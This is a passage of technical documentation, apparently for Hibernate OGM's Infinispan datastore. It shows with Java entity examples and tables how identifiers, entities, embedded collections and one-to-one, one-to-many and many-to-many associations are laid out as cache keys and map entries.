in the generic cache.\n\n.Define an identifier as a primitive type\n====\n[source, JAVA]\n----\n@Entity\npublic class Bookmark {\n\n @Id\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Bookmark` cache in `CACHE_PER_TABLE`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [42] | id | 42 \n | title | \"Hibernate OGM documentation\" \n|===\n\n.Content of the `ENTITIES` cache in `CACHE_PER_KIND`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| \"Bookmark\", [\"id\"], [42] | id | 42 \n | title | \"Hibernate OGM documentation\" \n|===\n====\n\n.Define an identifier using @EmbeddedId\n====\n[source, JAVA]\n----\n@Embeddable\npublic class NewsID implements Serializable {\n\n private String title;\n private String author;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class News {\n\n @EmbeddedId\n private NewsID newsId;\n private String content;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `News` cache in `CACHE_PER_TABLE`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY\n 2+^| MAP ENTRIES\n\n.3+^.^| [newsId.author, newsId.title], [\"Guillaume\", \"How to use Hibernate OGM ?\"]\n | newsId.author | \"Guillaume\"\n\n | newsId.title | \"How to use Hibernate OGM ?\"\n\n | content | \"Simple, just like ORM but with a NoSQL database\"\n|===\n\n.Content of the `ENTITIES` cache in `CACHE_PER_KIND`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY\n 2+^| MAP ENTRIES\n\n.3+^.^| \"News\", [newsId.author, newsId.title], [\"Guillaume\", \"How to use Hibernate OGM ?\"]\n | newsId.author | \"Guillaume\"\n\n | newsId.title | \"How to use Hibernate OGM ?\"\n\n | content | \"Simple, just like ORM but with a NoSQL database\"\n|===\n====\n\n====== Identifier generation strategies\n\nSince Infinispan has not native sequence nor identity column support,\nthese are simulated using the table strategy, however their default values vary.\nWe highly recommend you explicitly use a `TABLE` strategy if you want to generate a monotonic identifier.\n\nBut if you can, use a pure in-memory and scalable strategy like a UUID generator.\n\n.Id generation strategy TABLE using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE)\n private long id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n\n----\n\n.Content of the `hibernate_sequences` cache in `CACHE_PER_TABLE`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | [\"sequence_name\"], [\"default\"]\n^.^| 2\n|===\n\n.Content of the IDENTIFIERS cache in `CACHE_PER_KIND`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | \"hibernate_sequences\", [\"sequence_name\"], [\"default\"]\n^.^| 2\n|===\n====\n\nAs you can see, in `CACHE_PER_TABLE`, the key does not contain the id source table name.\nIt is inferred by the cache name hosting that key.\n\n.Id generation strategy TABLE using a custom table\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE, generator = \"guitarGen\")\n @TableGenerator(\n name = \"guitarGen\",\n table = \"GuitarPlayerSequence\",\n pkColumnName = \"seq\"\n pkColumnValue = \"guitarPlayer\",\n )\n private long id;\n\n \/\/ getters, setters ...\n}\n\n----\n\n.Content of the `GuitarPlayerSequence` cache in `CACHE_PER_TABLE`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | [\"seq\"], [\"guitarPlayer\"]\n^.^| 2\n|===\n\n.Content of the IDENTIFIERS cache in `CACHE_PER_KIND`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | \"GuitarPlayerSequence\", [\"seq\"], [\"guitarPlayer\"]\n^.^| 2\n|===\n====\n\n.SEQUENCE id generation strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Song {\n\n @Id\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"songSequenceGenerator\")\n @SequenceGenerator(\n name = \"songSequenceGenerator\",\n sequenceName = \"song_sequence\",\n initialValue = 2,\n allocationSize = 20\n )\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `hibernate_sequences` cache in `CACHE_PER_TABLE`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | [\"sequence_name\"], [\"song_sequence\"]\n^.^| 11\n|===\n\n.Content of the `IDENTIFIERS` cache in `CACHE_PER_KIND`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | \"hibernate_sequences\", \"[\"sequence_name\"], [\"song_sequence\"]\n^.^| 11\n|===\n====\n\n===== Entities\n\nEntities are stored in the cache named after the entity name when using the `CACHE_PER_TABLE` strategy.\nIn the `CACHE_PER_KIND` strategy, entities are stored in a single cache named `ENTITIES`.\n\nThe key is comprised of the following information:\n\n* the identifier column names\n* the identifier column values\n* the entity table (for the `CACHE_PER_KIND` strategy)\n\nIn `CACHE_PER_TABLE`, the table name is inferred from the cache name.\nIn `CACHE_PER_KIND`, the table name is necessary to identify the entity in the generic cache.\n\nThe entry value is an instance of `org.infinispan.atomic.FineGrainedMap` \nwhich contains all the entity properties -\nor to be specific columns.\nEach column name and value is stored as a key \/ value pair in the map.\nWe use this specialized map as Infinispan is able to transport changes\nin a much more efficient way.\n\n.Default JPA mapping for an entity\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `News` cache in `CACHE_PER_TYPE`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | title | \"On the merits of NoSQL\" \n|===\n\n.Content of the `ENTITIES` cache in `CACHE_PER_KIND`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| \"News\", [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | title | \"On the merits of NoSQL\" \n|===\n====\n\nAs you can see, the table name is not part of the key for `CACHE_PER_TYPE`.\nIn the rest of this section we will no longer show the `CACHE_PER_KIND` strategy.\n\n.Rename field and collection using @Table and @Column\n====\n[source, JAVA]\n----\n@Entity\n@Table(name = \"Article\")\npublic class News {\n\n @Id\n private String id;\n\n @Column(name = \"headline\")\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Article` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | headline | \"On the merits of NoSQL\" \n|===\n====\n\n====== Embedded objects and collections\n\n.Embedded object\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n @Embedded\n private NewsPaper paper;\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class NewsPaper {\n\n private String name;\n private String owner;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `News` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.4+^.^| [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | title | \"On the merits of NoSQL\" \n | paper.name | \"NoSQL journal of prophecies\" \n | paper.owner | \"Delphy\" \n|===\n====\n\n.@ElementCollection with one attribute\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `GrandMother` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n ^.^| [\"id\"], [\"granny\"] | id | \"granny\"\n|===\n\n.Content of the `associations_GrandMother_grandChildren` cache in `CACHE_PER_TYPE`\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.4+^.^| [\"GrandMother_id\"], [\"granny\"]\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Leia\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Leia\"\n\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Luke\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Luke\"\n|===\n\n.Content of the `ASSOCIATIONS` cache in `CACHE_PER_KIND`\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.4+^.^| \"GrandMother_grandChildren\", [\"GrandMother_id\"], [\"granny\"]\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Leia\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Leia\"\n\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Luke\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Luke\"\n|===\n====\n\nHere, we see that the collection of elements is stored in a separate cache and entry.\nThe association key is made of:\n\n* the foreign key column names pointing to the owner of this association\n* the foreign key column values pointing to the owner of this association\n* the association table name in the `CACHE_PER_KIND` approach where all associations share the same cache\n\nThe association entry is a map containing the representation of each entry in the collection.\nThe keys of that map are made of:\n\n* the names of the columns uniquely identifying that specific collection entry\n (e.g. for a `Set` this is all of the columns)\n* the values of the columns uniquely identifying that specific collection entry\n\nThe value attack to that collection entry key is a Map containing the key value pairs column name \/ column value.\n\n.@ElementCollection with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n @OrderColumn( name = \"birth_order\" )\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `GrandMother` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n ^.^| [\"id\"], [\"granny\"] | id | \"granny\"\n|===\n\n.Content of the `GrandMother_grandChildren` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.6+^.^| [\"GrandMother_id\"], [\"granny\"]\n.3+^.^| [\"GrandMother_id\", \"birth_order\"], [\"granny\", 0]\n | GrandMother_id\n | \"granny\"\n\n | birth_order\n | 0\n\n | name\n | \"Leia\"\n\n.3+^.^| [\"GrandMother_id\", \"birth_order\"], [\"granny\", 1]\n | GrandMother_id\n | \"granny\"\n\n | birth_order\n | 1\n\n | name\n | \"Luke\"\n|===\n====\n\nHere we used an indexed collection and to identify the entry in the collection,\nonly the owning entity id and the index value is enough.\n\n.@ElementCollection with Map of @Embeddable\n====\n[source, JAVA]\n----\n@Entity\npublic class ForumUser {\n\n\t@Id\n\tprivate String name;\n\n\t@ElementCollection\n\tprivate Map<String, JiraIssue> issues = new HashMap<>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class JiraIssue {\n\n\tprivate Integer number;\n\tprivate String project;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `ForumUser` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n ^.^| [\"id\"], [\"Jane Doe\"] | id | \"Jane Doe\"\n|===\n\n.Content of the `ForumUser_issues` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.12+^.^| [\"ForumUser_id\"], [\"Jane Doe\"]\n\n.4+^.^| [\"ForumUser_id\", \"issues_KEY\"], [\"Jane Doe\", \"issueWithNull\"]\n\n | ForumUser_id\n | Jane Doe\n\n | issue_KEY\n | \"issueWithNull\"\n\n | issues.value.project\n | <null>\n\n | issues.value.number\n | <null>\n\n.4+^.^| [\"ForumUser_id\", \"issues_KEY\"], [\"Jane Doe\", \"issue1\"]\n\n | ForumUser_id\n | \"Jane Doe\"\n\n | issue_KEY\n | \"issue1\"\n\n | issues.value.project\n | \"OGM\"\n\n | issues.value.number\n | 1253\n\n.4+^.^| [\"ForumUser_id\", \"issues_KEY\"], [\"Jane Doe\", \"issue2\"]\n\n | ForumUser_id\n | \"Jane Doe\"\n\n | issue_KEY\n | \"issue2\"\n\n | issues.value.project\n | \"HSEARCH\"\n\n | issues.value.number\n | 2000\n|===\n====\n\n===== Associations\n\nAssociations between entities are mapped like (collection of) embeddables \nexcept that the target entity is represented by its identifier(s).\n\n\n.Unidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicule {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n private Vehicule vehicule;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Vehicule` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"V_01\"] | id | \"V_01\"\n | brand | \"Mercedes\"\n|===\n\n.Content of the `Wheel` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.3+^.^| [\"id\"], [\"W001\"] | id | \"W001\"\n | diameter | 0.0\n | vehicule_id | \"V_01\"\n|===\n====\n\n[[infinispan-in-entity-one-to-one-join-column]]\n.Unidirectional one-to-one with @JoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicule {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @JoinColumn( name = \"part_of\" )\n private Vehicule vehicule;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Vehicle` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"V_01\"] | id | \"V_01\"\n | brand | \"Mercedes\"\n|===\n\n.Content of the `Wheel` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.3+^.^| \"Wheel\", [\"id\"], [\"W001\"] | id | \"W001\"\n | diameter | 0.0\n | part_of | \"V_01\"\n|===\n====\n\n.Unidirectional one-to-one with @MapsId and @PrimaryKeyJoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicule {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @PrimaryKeyJoinColumn\n @MapsId\n private Vehicule vehicule;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Vehicle` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"V_01\"] | id | \"V_01\"\n | brand | \"Mercedes\"\n|===\n\n.Content of the `Wheel` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"vehicule_id\"], [\"V_01\"] | vehicule_id | \"V_01\"\n | diameter | 0.0\n|===\n====\n\n.Bidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Husband {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Wife wife;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wife {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne(mappedBy=\"wife\")\n private Husband husband;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Husband` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.3+^.^| [\"id\"], [\"alex\"] | id | \"alex\"\n | name | \"Alex\"\n | wife | \"bea\"\n|===\n\n.Content of the `Wife` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"bea\"] | id | \"bea\"\n | name | \"Bea\"\n|===\n\n.Content of the `associations_Husband` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.2+^.^| [\"wife\"], [\"bea\"]\n.2+^.^| [\"id\", \"wife\"], [\"alex\", \"bea\"]\n | id\n | \"alex\"\n\n | wife\n | \"bea\"\n|===\n====\n\n.Unidirectional one-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Basket` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"davide_basket\"] | id | \"davide_basket\"\n | owner | \"Davide\"\n|===\n\n.Content of the `Product` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"name\"], [\"Beer\"] | name | \"Beer\"\n | description | \"Tactical Nuclear Penguin\"\n\n.2+^.^| [\"name\"], [\"Pretzel\"] | name | \"Pretzel\"\n | description | \"Glutino Pretzel Sticks\"\n|===\n\n.Content of the `associations_Basket_Product` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"Basket_id\"], [\"davide_basket\"]\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Beer\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Beer\"\n\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Pretzel\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Pretzel\"\n\n\n|===\n====\n\n.Unidirectional one-to-many with `@JoinTable`\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n @JoinTable( name = \"BasketContent\" )\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Basket` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"davide_basket\"] | id | \"davide_basket\"\n | owner | \"Davide\"\n|===\n\n.Content of the `Basket` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"name\"], [\"Beer\"] | name | \"Beer\"\n | description | \"Tactical Nuclear Penguin\"\n\n.2+^.^| [\"name\"], [\"Pretzel\"] | name | \"Pretzel\"\n | description | \"Glutino Pretzel Sticks\"\n|===\n\n.Content of the `associations_BasketContent` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"Basket_id\"], [\"davide_basket\"]\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Beer\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Beer\"\n\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Pretzel\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Pretzel\"\n|===\n====\n\n.Unidirectional one-to-many using maps with defaults\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n private Map<String, Address> addresses = new HashMap<String, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `User` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n ^.^| [\"id\"], [\"user_001\"] | id | \"user_001\"\n|===\n\n.Content of the `Address` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"address_001\"] | id | \"address_001\"\n | city | \"Rome\"\n\n.2+^.^| [\"id\"], [\"address_002\"] | id | \"address_002\"\n | city | \"Paris\"\n|===\n\n\n.Content of the `associations_User_address` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.6+^.^| [\"User_id\"], \"user_001\"]\n.3+^.^| [\"User_id\", \"addresses_KEY\"], [\"user_001\", \"home\"]\n | User_id\n | \"user_001\"\n\n | addresses_KEY\n | \"home\"\n\n | addresses_id\n | \"address_001\"\n\n\n.3+^.^| [\"User_id\", \"addresses_KEY\"], [\"user_001\", \"work\"]\n | User_id\n | \"user_002\"\n\n | addresses_KEY\n | \"work\"\n\n | addresses_id\n | \"address_002\"\n|===\n====\n\n.Unidirectional one-to-many using maps with @MapKeyColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n @MapKeyColumn(name = \"addressType\")\n private Map<String, Address> addresses = new HashMap<String, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `User` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n ^.^| [\"id\"], [\"user_001\"] | id | \"user_001\"\n|===\n\n.Content of the `Address` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"address_001\"] | id | \"address_001\"\n | city | \"Rome\"\n\n.2+^.^| [\"id\"], [\"address_002\"] | id | \"address_002\"\n | city | \"Paris\"\n|===\n\n.Content of the `associations_User_address` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.6+^.^| [\"User_id\"], \"user_001\"]\n.3+^.^| [\"User_id\", \"addressType\"], [\"user_001\", \"home\"]\n | User_id\n | \"user_001\"\n\n | addressesType\n | \"home\"\n\n | addresses_id\n | \"address_001\"\n\n\n.3+^.^| [\"User_id\", \"addressType\"], [\"user_001\", \"work\"]\n | User_id\n | \"user_002\"\n\n | addressesType\n | \"work\"\n\n | addresses_id\n | \"address_002\"\n|===\n====\n\n.Unidirectional many-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class JavaUserGroup {\n\n @Id\n private String jugId;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Member {\n\n @Id\n private String id;\n private String name;\n\n @ManyToOne\n private JavaUserGroup memberOf;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `JavaUserGroup` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"jugId\"], [\"summer_camp\"] | jugId | \"summer_camp\"\n | name | \"JUG Summer Camp\"\n|===\n\n.Content of the `Member` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.3+^.^| [\"member_id\"], [\"emmanuel\"] | member_id | \"emmanuel\"\n | name | \"Emmanuel Bernard\"\n | memberOf_jug_id | \"summer_camp\"\n\n.3+^.^| [\"member_id\"], [\"jerome\"] | member_id | \"jerome\"\n | name | \"Jerome\"\n | memberOf_jug_id | \"summer_camp\"\n|===\n====\n\n.Bidirectional many-to-one \n====\n[source, JAVA]\n----\n@Entity\npublic class SalesForce {\n\n @Id\n private String id;\n private String corporation;\n\n @OneToMany(mappedBy = \"salesForce\")\n private Set<SalesGuy> salesGuys = new HashSet<SalesGuy>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class SalesGuy {\n private String id;\n private String name;\n\n @ManyToOne\n private SalesForce salesForce;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `SalesForce` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"red_hat\"] | id | \"red_hat\"\n | corporation | \"Red Hat\"\n|===\n\n.Content of the `SalesGuy` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.3+^.^| [\"id\"], [\"eric\"] | id | \"eric\"\n | name | \"Eric\"\n | salesForce_id | \"red_hat\"\n\n.3+^.^| [\"id\"], [\"simon\"] | id | \"simon\"\n | name | \"Simon\"\n | salesForce_id | \"red_hat\"\n|===\n\n.Content of the `associations_SalesGuy` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"salesForce_id\"], [\"red_hat\"]\n.2+^.^| [\"salesForce_id\", \"id\"], [\"red_hat\", \"eric\"]\n | salesForce_id\n | \"red_hat\"\n\n | id\n | \"eric\"\n\n.2+^.^| [\"salesForce_id\", \"id\"], [\"red_hat\", \"simon\"]\n | salesForce_id\n | \"red_hat\"\n\n | id\n | \"simon\"\n|===\n====\n\n.Unidirectional many-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nThe \"Math\" class has 2 students: John Doe and Mario Rossi\n\nThe \"English\" class has 2 students: Kate Doe and Mario Rossi\n\n.Content of the `ClassRoom` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [1] | id | 1 \n | name | \"Math\"\n\n.2+^.^| [\"id\"], [2] | id | 2 \n | name | \"English\"\n|===\n\n.Content of the `Student` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"john\"] | id | \"john\"\n | name | \"John Doe\"\n\n.2+^.^| [\"id\"], [\"mario\"] | id | \"mario\"\n | name | \"Mario Rossi\"\n\n.2+^.^| [\"id\"], [\"kate\"] | id | \"kate\"\n | name | \"Kate Doe\"\n|===\n\n.Content of the `associations_ClassRoom_Student` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"ClassRoom_id\"], [1]\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [1, \"mario\"]\n | ClassRoom_id\n | 1 \n\n | students_id\n | \"mario\"\n\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [1, \"john\"]\n | ClassRoom_id\n | 1 \n\n | students_id\n | \"john\"\n\n.4+^.^| [\"ClassRoom_id\"], [2]\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [2, \"kate\"]\n | ClassRoom_id\n | 2 \n\n | students_id\n | \"kate\"\n\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [2, \"mario\"]\n | ClassRoom_id\n | 2 \n\n | students_id\n | \"mario\"\n|===\n====\n\n.Bidirectional many-to-many \n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany( mappedBy = \"bankAccounts\" )\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nDavid owns 2 accounts: \"012345\" and \"ZZZ-009\"\n\n.Content of the `AccountOwner` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"David\"] | id | \"David\"\n | SSN | \"0123456\"\n|===\n\n.Content of the `BankAccount` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"account_1\"] | id | \"account_1\"\n | accountNumber | \"X2345000\"\n\n.2+^.^| [\"id\"], [\"account_2\"] | id | \"account_2\"\n | accountNumber | \"ZZZ-009\"\n|===\n\n.Content of the `AccountOwner_BankAccount` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.2+^.^| [\"bankAccounts_id\"], [\"account_1\"]\n.2+^.^| [\"bankAccounts_id\", \"owners_id\"], [\"account_1\", \"David\"]\n | bankAccounts_id\n | \"account_1\"\n\n | owners_id\n | \"David\"\n\n.2+^.^| [\"bankAccounts_id\"], [\"account_2\"]\n.2+^.^| [\"bankAccounts_id\", \"owners_id\"], [\"account_2\", \"David\"]\n | bankAccounts_id\n | \"account_2\"\n\n | owners_id\n | \"David\"\n\n.4+^.^| [\"owners_id\"], [\"David\"]\n.2+^.^| [\"owners_id\", \"banksAccounts_id\"], [\"David\", \"account_1\"]\n | bankAccounts_id\n | \"account_1\"\n\n | owners_id\n | 